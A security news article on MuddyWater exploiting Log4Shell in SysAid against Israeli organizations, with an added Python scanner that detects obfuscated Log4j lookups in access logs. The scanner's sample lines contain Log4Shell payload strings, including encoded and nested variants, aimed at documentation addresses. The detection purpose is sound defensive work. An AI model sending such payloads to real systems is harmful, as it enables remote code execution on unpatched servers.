Microsoft: Iranian hackers still exploiting Log4j bugs against Israel (Security News, August 2022)
Attackers continue to exploit the Log4j vulnerability in unpatched applications, as shown by the Iranian 'MuddyWater' threat actor, which was found targeting Israeli organizations through the SysAid software.
The latest MuddyWater hacking campaign outlined in a Microsoft report yesterday constitutes the first example of leveraging vulnerable SysAid applications to breach corporate networks.
MuddyWater previously targeted VMware instances carrying Log4j flaws to drop web shells, but presumably because those were eventually patched, the threat actors looked for alternative entry points.
The Iranian hackers exploit Log4Shell flaws for initial access, sending a specially crafted request to vulnerable endpoints that runs malicious PowerShell and drops web shells.
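A defender reviewing web server logs for the initial-access step described above needs to recognize the Log4j lookup string even when the request encodes or nests it. The following added example (not from the Microsoft or Security Joes reports) normalizes common Log4j lookup nesting and URL encoding before matching, and runs over constructed access-log lines with RFC 5737 documentation addresses.

```python
import re
from urllib.parse import unquote

# Log4j lookups that resolve to a single character or a default value:
# ${lower:J} -> j, ${upper:n} -> N, ${::-j} -> j, ${env:NOTSET:-j} -> j.
_INNER = re.compile(r"\$\{(lower|upper):(.)\}|\$\{[^${}]*:-([^${}]*)\}", re.IGNORECASE)

# The resolved lookup we actually care about: ${jndi:<protocol>...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)", re.IGNORECASE)


def _resolve(m: re.Match) -> str:
    """Replace one inner lookup with the value Log4j would substitute."""
    if m.group(1):  # ${lower:X} / ${upper:X}
        ch = m.group(2)
        return ch.lower() if m.group(1).lower() == "lower" else ch.upper()
    return m.group(3)  # ${name:-default} with an unset name -> default


def normalize(line: str, max_rounds: int = 10) -> str:
    """URL-decode once, then collapse nested lookups innermost-first."""
    s = unquote(line)
    for _ in range(max_rounds):  # bounded: a hostile line cannot loop forever
        new = _INNER.sub(_resolve, s)
        if new == s:
            break
        s = new
    return s


def find_log4shell(line: str):
    """Return the JNDI protocol named in a Log4Shell lookup, or None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (index, protocol) for every line carrying a JNDI lookup."""
    return [(i, p) for i, p in enumerate(map(find_log4shell, lines)) if p]


# Constructed sample access-log lines (not real traffic): one benign request,
# one plain lookup in the User-Agent, one URL-encoded and case-obfuscated
# lookup in the query string, one built entirely from default-value lookups.
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [13/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.10:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:15 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F203.0.113.4%2Fx%7D HTTP/1.1" 404 0',
    '10.0.0.11 - - [13/Dec/2021:10:01:21 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.8/x}"',
]

if __name__ == "__main__":
    for idx, proto in scan(SAMPLE_LOGS):
        print(f"line {idx}: JNDI lookup via {proto}")
```

A hit only shows that a lookup string reached the server; whether the application was vulnerable is confirmed by outbound LDAP/RMI/DNS connections from the host to the address in the lookup.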
Ligolo is an open-source reverse-tunneling tool that the hackers use to secure communications between their backdoors and C2 infrastructure.
While Microsoft's report doesn't go into the details of the particular tool, we know from a March 2022 report by Security Joes that the hackers added useful features like execution checks and command-line parameters.